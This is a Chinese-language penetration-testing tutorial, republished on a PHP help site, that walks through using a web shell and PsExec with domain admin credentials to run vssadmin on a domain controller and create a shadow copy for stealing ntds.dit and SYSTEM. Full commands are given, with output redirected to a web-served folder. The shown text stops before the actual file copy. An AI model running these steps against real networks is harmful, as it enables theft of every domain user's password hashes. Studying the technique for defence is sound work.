通过Webshell远程导出域控ntds.dit的方法

星夢妙者

发布时间：2025-09-07 08:49:13

759人浏览过

来源于php中文网

原创

大家好！今天我想分享一些关于“windows active directory（ad）”环境的内容。我将通过web shell演示“如何转储windows active directory用户数据库”。在渗透测试过程中，测试人员可能已经连接到windows active directory森林中的一台计算机，并获得了“domain admin”用户凭据和web shell访问权限。虽然测试人员试图进一步获取reverse shell，但由于某些原因（如网络防火墙阻止）无法实现。然而，测试者的最终目标可能并不是获取shell，而是转储ad用户数据库，即用户和adl环境的ntlm密码哈希值。

在我的渗透测试过程中，我也遇到了同样的问题（没有公网IP服务器）。经过一番讨论后，我找到了一种方法，如果我们拥有“AD Domain Admin”用户凭据，通过WebShell可以实现上述目标。

假设我们可以访问Windows机器上的Web shell，该机器连接到域“LABONE”，其IP为“192.168.56.101”。域管理员的用户名为“user1”，密码为“ica_1046”。

我们将使用以下两个二进制文件：

如果我们能够在Windows AD域控机器上运行“vssadmin”命令，它将生成“C”盘的卷影副本。从该卷影副本中，我们可以复制“ntds.dit”和“SYSTEM”文件。为了实现这一任务，我们将使用“psexec.exe”。通过指定“elevated”选项（通过-h参数），并提供目标计算机IP、域管理员用户名及其密码，我们可以在远程Windows计算机上执行命令。我们需要通过Web shell在Windows机器“LABONE”上上传psexec.exe。从Web shell中，我们将使用“vssadmin”命令，指定AD域控机器IP、域管理员用户名及其密码。

psexec文件将在Windows AD域控计算机上远程执行vssadmin命令。在创建“C”盘卷影副本后，我们需要将“ntds.dit”和“SYSTEM”文件从该卷影副本复制到我们具有Web shell访问权限的机器，即Windows域机器“LABONE”。这个任务可以通过使用“psexec”来完成，我们只需在“copy”命令中指定目标AD域控机器的IP、域管理员用户名和密码即可，请使用SMB将ndts.dit和SYSTEM文件从卷影副本复制到LABONE机器。我将这些文件复制到了存储psexec文件的同一目录下。

使用“psexec”在远程主机上执行命令的常规用法如下：

psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute"

就我而言，我应填写如下信息：

remote_IP 192.168.56.200（queen.DC1.indishell.lab）
user_name user1
password_of_the_user ica_1046

我在Windows域机器“LABONE”上具有Web shell访问权限，并在服务器上传了psexec二进制文件。

通过Webshell远程导出域控ntds.dit的方法

首先，我们先来检查下是否有“C”盘的卷影副本可用。你可以使用以下命令来列出可用的卷影副本：

vssadmin list shadows

由于Web shell无法显示远程主机上psexec binary执行的所有命令输出，我将命令输出重定向到了“LABONE”上，并保存在C:\xampp\htdocs\box\ps\目录下。执行该步骤的命令如下：

SEEK.ai

AI驱动的智能数据解决方案，询问您的任何数据并立即获得答案

下载

PsExec.exe  \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin list shadows > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt"

通过Webshell远程导出域控ntds.dit的方法

Web shell显示psexec正在远程Windows AD域控机器上执行命令。如果一切顺利，我们将在目录“C:\xampp\htdocs\box\ps”中获取到一个名为“out.txt”的文件，它将包含在AD域控（192.168.56.200）上执行的“vssadmin list shadows”命令的输出。

通过Webshell远程导出域控ntds.dit的方法

可以看到out.txt文件已生成在了目录中，让我们来查看下其中的内容。

通过Webshell远程导出域控ntds.dit的方法

“out.txt”文件内容显示，目标域控机器到目前为止并没有任何的卷影副本。

让我们创建一个“C”盘的卷影副本，以窃取“ntds.dit”和“SYSTEM”文件。

用于创建C盘卷影副本的命令如下：

vssadmin create shadow /for=C:

我们需要有新创建的“C”盘卷影副本的名称，它将在命令的输出中，因此我们将把上述命令的输出重定向到我们拥有Web shell访问权的机器上。

要从目标机器复制“ntds.dit”和“SYSTEM”文件，我们需要有卷影副本的名称。最终的命令为：

PsExec.exe  \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin create shadow /for=C: > \\192.168.56.101\C$\xampp\htdocs\box\ps\out2.txt"

Windows怎么查看电脑是否支持TPM Win10/Win11检查安全模块教程

Windows怎么查看网络适配器的物理地址 Win10/Win11获取MAC地址教程

Win11怎么设置任务栏显示秒数_Windows11注册表ShowSecondsInSystemClock

Windows提示“应用程序无法正常启动0xc000007b” Windows环境运行库修复方法

Win11怎么开启开发者模式 Win11开发者选项打开方法【开发】

相关专题

windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口，端口号的范围从0到65535，比如用于浏览网页服务的80端口，用于FTP服务的21端口等等。怎么查看windows端口占用情况呢？php中文网给大家带来了相关的教程以及文章，欢迎大家前来阅读学习。

787

2023.07.26

查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口，端口占用问题是计算机系统编程领域的一个常见问题，端口占用的根本原因可能是操作系统的一些错误，服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章，欢迎大家前来学习阅读。

1129

2023.07.27

windows照片无法显示

当我们尝试打开一张图片时，可能会出现一个错误提示，提示说"Windows照片查看器无法显示此图片，因为计算机上的可用内存不足"，本专题为大家提供windows照片无法显示相关的文章，帮助大家解决该问题。

803

2023.08.01

windows查看端口被占用的情况

windows查看端口被占用的情况的方法：1、使用Windows自带的资源监视器；2、使用命令提示符查看端口信息；3、使用任务管理器查看占用端口的进程。本专题为大家提供windows查看端口被占用的情况的相关的文章、下载、课程内容，供大家免费下载体验。

454

2023.08.02

windows无法访问共享电脑

在现代社会中，共享电脑是办公室和家庭的重要组成部分。然而，有时我们可能会遇到Windows无法访问共享电脑的问题。这个问题可能会导致数据无法共享，影响工作和生活的正常进行。php中文网给大家带来了相关的教程以及文章，欢迎大家前来阅读学习。

2355

2023.08.08

windows自动更新

Windows操作系统的自动更新功能可以确保系统及时获取最新的补丁和安全更新，以提高系统的稳定性和安全性。然而，有时候我们可能希望暂时或永久地关闭Windows的自动更新功能。php中文网给大家带来了相关的教程以及文章，欢迎大家前来学习阅读。

823

2023.08.10

windows boot manager

windows boot manager无法开机的解决方法：1、系统文件损坏，使用Windows安装光盘或USB启动盘进入恢复环境，选择修复计算机，然后选择自动修复；2、引导顺序错误，进入恢复环境，选择命令提示符，输入命令"bootrec /fixboot"和"bootrec /fixmbr"，然后重新启动计算机；3、硬件问题，使用硬盘检测工具进行扫描和修复；4、重装操作系统。本专题还提供其他解决

1626

2023.08.28